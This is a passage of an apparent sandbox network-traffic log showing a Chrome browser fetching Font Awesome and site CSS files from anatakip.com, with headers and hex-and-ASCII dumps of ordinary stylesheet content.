                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC760INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=2592000
                    expires: Wed, 12 Jun 2024 00:19:40 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 1204672
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tjf6AUBWDtT47xvxHpBkPoaUjGLzJ8akO48PhgyTKoMaIiUv2KQy%2BP1BXnNiXGBPfIUKhddsgj3IfWicSXFcwUkcMWCoSmtElhLV%2BMTpBpLsOlIuXJp4tTaSS%2F33M14%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d62598d437f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC609INData Raw: 37 31 38 62 0d 0a 2f 2a 21 0d 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 36 2e 33 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0d 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0d 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d
                    Data Ascii: 718b/*! * Font Awesome 4.6.3 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=
                    2024-05-26 22:57:32 UTC1369INData Raw: 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 3a 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 31 20 46 6f 6e 74 41 77 65 73 6f 6d 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 66 61 2d 6c 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 33 33
                    Data Ascii: ar') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.333
                    2024-05-26 22:57:32 UTC1369INData Raw: 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 39 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 31 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 31 38 30 7b 2d
                    Data Ascii: (0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-rotate-90{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-
                    2024-05-26 22:57:32 UTC1369INData Raw: 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32 22 7d 2e 66 61 2d 65 6e 76 65 6c 6f 70 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 33 22 7d 2e 66 61 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 34 22 7d 2e 66 61 2d 73 74 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 35 22 7d 2e 66 61 2d 73 74 61 72 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 36 22 7d 2e 66 61 2d 75 73 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 37 22 7d 2e 66 61 2d 66 69 6c 6d 3a 62 65 66 6f 72 65 7b 63
                    Data Ascii: "}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart:before{content:"\f004"}.fa-star:before{content:"\f005"}.fa-star-o:before{content:"\f006"}.fa-user:before{content:"\f007"}.fa-film:before{c
                    2024-05-26 22:57:32 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 61 22 7d 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 62 22 7d 2e 66 61 2d 74 61 67 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 63 22 7d 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 64 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 65 22 7d 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 66 22 7d 2e 66 61 2d 63 61 6d
                    Data Ascii: ontent:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.fa-tags:before{content:"\f02c"}.fa-book:before{content:"\f02d"}.fa-bookmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-cam
                    2024-05-26 22:57:32 UTC1369INData Raw: 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 30 22 7d 2e 66 61 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 31 22 7d 2e 66 61 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 32 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 33 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 34 22 7d 2e 66 61 2d 70 6c 75 73 2d 63 69 72 63 6c 65 3a 62 65 66 6f
                    Data Ascii: f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:befo
                    2024-05-26 22:57:32 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 37 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 38 22 7d 2e 66 61 2d 72 65 74 77 65 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 39 22 7d 2e 66 61 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 61 22 7d 2e 66 61 2d 66 6f 6c 64 65 72 3a 62 65
                    Data Ascii: re{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:be
                    2024-05-26 22:57:32 UTC1369INData Raw: 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 62 22 7d 2e 66 61 2d 75 6e 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 63 22 7d 2e 66 61 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 64 22 7d 2e 66 61 2d 66 65 65 64 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 65 22 7d 2e 66 61 2d 68 64 64 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 61 30 22 7d 2e 66 61 2d 62 75 6c 6c 68 6f 72 6e 3a 62 65 66 6f 72 65 7b
                    Data Ascii: ok-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-feed:before,.fa-rss:before{content:"\f09e"}.fa-hdd-o:before{content:"\f0a0"}.fa-bullhorn:before{
                    2024-05-26 22:57:32 UTC1369INData Raw: 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 63 22 7d 2e 66 61 2d 75 6e 64 65 72 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 64 22 7d 2e 66 61 2d 74 61 62 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 65 22 7d 2e 66 61 2d 6d 61 67 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 30 22 7d 2e 66 61 2d 74 72 75 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 64 31 22 7d 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66
                    Data Ascii: nt:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:"\f0cd"}.fa-table:before{content:"\f0ce"}.fa-magic:before{content:"\f0d0"}.fa-truck:before{content:"\f0d1"}.fa-pinterest:before{content:"\f
                    2024-05-26 22:57:32 UTC1369INData Raw: 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 30 22 7d 2e 66 61 2d 73 74 65 74 68 6f 73 63 6f 70 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 31 22 7d 2e 66 61 2d 73 75 69 74 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 32 22 7d 2e 66 61 2d 62 65 6c 6c 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 61 32 22 7d 2e 66 61 2d 63 6f 66 66 65 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 66 34 22 7d 2e 66 61 2d 63 75 74 6c 65 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30
                    Data Ascii: f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:before{content:"\f0f1"}.fa-suitcase:before{content:"\f0f2"}.fa-bell-o:before{content:"\f0a2"}.fa-coffee:before{content:"\f0f4"}.fa-cutlery:before{content:"\f0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.549719104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC629OUTGET /assets/style/paper.css?v=v3.1.5 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC827INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Content-Length: 15424
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=21048
                    cache-control: public, max-age=2592000
                    expires: Sat, 22 Jun 2024 00:51:38 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 338753
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dJjQ8v4VLTR8rrfn%2Fg9HyfCmAB5NwJyWoodIaQxnDMeePd1H%2F1ii6lEgt8lNLe%2FzugOU4yuEkCXs82fhqXOMuWTN4Tjt%2BEymYFb6mgI0%2FWa4LjTJ%2BDXQqEE1sHTFKE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d624c744294-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC542INData Raw: 62 6f 64 79 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 34 70 78 7d 2a 3a 66 6f 63 75 73 2c 2a 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 6c 6f 67 67 65 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 38 70 78 7d 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 63 6c 65 61 72 3a 62 6f 74 68 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 3e 6c 69 3e 61 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 40 6d 65 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 63 6c 65 61 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 6f 70 65
                    Data Ascii: body{padding-top:64px}*:focus,*:active{outline:none!important}bodylogged{padding-top:108px}.navbar-collapse{clear:both!important}.nav>li>a{padding:10px}@media(min-width:768px){.navbar-collapse{clear:none!important}}@media(max-width:767px){.navbar-nav .ope
                    2024-05-26 22:57:32 UTC1369INData Raw: 20 31 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 37 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 36 70 78 20 31 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 37 35 29 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 7d 7d 74 65 78 74 61 72 65 61 2c 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 5b 74 79
                    Data Ascii: 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175);-webkit-background-clip:padding-box;background-clip:padding-box}}textarea,textarea.form-control,input.form-control,input[type=text],input[type=password],input[type=email],input[type=number],[ty
                    2024-05-26 22:57:32 UTC1369INData Raw: 29 7d 2e 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 2e 6e 61 76 62 61 72 2d 69 63 6f 6e 3e 61 3a 68 6f 76 65 72 2c 2e 6e 61 76 62 61 72 2d 64 65 66 61 75 6c 74 20 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 2e 6e 61 76 62 61 72 2d 69 63 6f 6e 3e 61 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 70 2e 6e 61 76 62 61 72 2d 74 65 78 74 7b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 34 70 78 7d 62 75 74 74 6f 6e 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 6e 61 76 20 2e 66 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 6e 61
                    Data Ascii: )}.navbar-default .navbar-nav>li.navbar-icon>a:hover,.navbar-default .navbar-nav>li.navbar-icon>a:focus{background:#eee;text-shadow:none;color:inherit}p.navbar-text{margin:0;line-height:64px}button.navbar-toggle{margin-top:14px}.nav .fa{font-size:18px}.na
                    2024-05-26 22:57:32 UTC1369INData Raw: 34 38 66 7d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 64 38 31 39 36 35 7d 75 6c 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 75 6c 2e 73 6f 63 69 61 6c 2d 62 75 74 74 6f 6e 73 20 6c 69 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 77 69 64 74 68 3a 34 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 75 74 6c 69 6e 65 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72
                    Data Ascii: 48f}footer a:hover{color:#d81965}ul.social-buttons{margin-bottom:0}ul.social-buttons li a{display:block;background-color:#222;height:40px;width:40px;border-radius:100%;font-size:20px;line-height:40px;color:#fff;outline:0;-webkit-transition:all .3s;-moz-tr
                    2024-05-26 22:57:32 UTC1369INData Raw: 2e 72 61 74 69 6e 67 20 2e 66 61 2d 73 74 61 72 2d 6f 7b 63 6f 6c 6f 72 3a 23 39 39 39 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 72 61 74 69 6e 67 20 2e 66 61 2d 73 74 61 72 7b 63 6f 6c 6f 72 3a 23 66 63 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 72 61 74 69 6e 67 20 2e 66 61 2d 73 74 61 72 2b 2e 66 61 2d 73 74 61 72 2d 6f 7b 63 6f 6c 6f 72 3a 23 65 36 39 35 30 30 7d 68 32 2e 70 72 69 63 65 7b 6d 61 72 67 69 6e 3a 30 7d 2e 75 73 65 72 2d 74 68 75 6d 62 20 2e 70 72 69 63 65 7b 63 6f 6c 6f 72 3a 23 34 34 34 7d 2e 75 73 65 72 2d 74 68 75 6d 62 20 2e 70 72 69 63 65 2d 6e 65 77 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 2e 75 73 65 72 2d 74 68 75 6d 62 20 2e 70 72 69 63 65 2d 6f 6c 64 7b 63 6f 6c 6f 72 3a 23 39 39 39 3b 74 65 78 74
                    Data Ascii: .rating .fa-star-o{color:#999;font-size:15px}.rating .fa-star{color:#fc0;font-size:15px}.rating .fa-star+.fa-star-o{color:#e69500}h2.price{margin:0}.user-thumb .price{color:#444}.user-thumb .price-new{font-weight:600}.user-thumb .price-old{color:#999;text
                    2024-05-26 22:57:32 UTC1369INData Raw: 64 69 61 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 39 39 70 78 29 7b 23 75 73 65 72 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6c 2d 6d 64 2d 32 3a 6e 74 68 2d 63 68 69 6c 64 28 36 6e 2b 31 29 2c 23 75 73 65 72 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6c 2d 6d 64 2d 32 3a 6e 74 68 2d 63 68 69 6c 64 28 36 6e 2b 31 29 2c 23 75 73 65 72 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6c 2d 6d 64 2d 33 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 75 73 65 72 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6c 2d 6d 64 2d 34 3a 6e 74 68 2d 63 68 69 6c 64 28 33 6e 2b 31 29 2c 23 75 73 65 72 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63
                    Data Ascii: dia(min-width:992px) and (max-width:1199px){#user-list-container .col-md-2:nth-child(6n+1),#user-list-container .col-md-2:nth-child(6n+1),#user-list-container .col-md-3:nth-child(4n+1),#user-list-container .col-md-4:nth-child(3n+1),#user-list-container .c
                    2024-05-26 22:57:32 UTC1369INData Raw: 74 72 79 2d 74 68 75 6d 62 20 2e 65 6e 74 72 79 2d 6d 65 64 69 61 20 2e 69 6d 61 67 65 20 69 6d 67 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 33 30 30 70 78 7d 2e 65 6e 74 72 79 2d 74 68 75 6d 62 20 2e 61 63 74 69 6f 6e 2d 6c 69 6e 6b 73 7b 7d 2e 65 6e 74 72 79 2d 67 72 69 64 20 2e 65 6e 74 72 79 2d 74 68 75 6d 62 20 2e 69 6d 61 67 65 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 2e 69 6d 67 2d 62 6c 6f 67 6c 69 73 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 32 35 30 70 78 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 7d 2e 6f 74 68 65 72 62 6c 6f 67 73 7b 62 61 63 6b 67 72 6f
                    Data Ascii: try-thumb .entry-media .image img{margin-left:auto;margin-right:auto;object-fit:cover;width:100%;height:300px}.entry-thumb .action-links{}.entry-grid .entry-thumb .image{float:none}.img-bloglist{width:100%;height:250px;object-fit:cover}.otherblogs{backgro
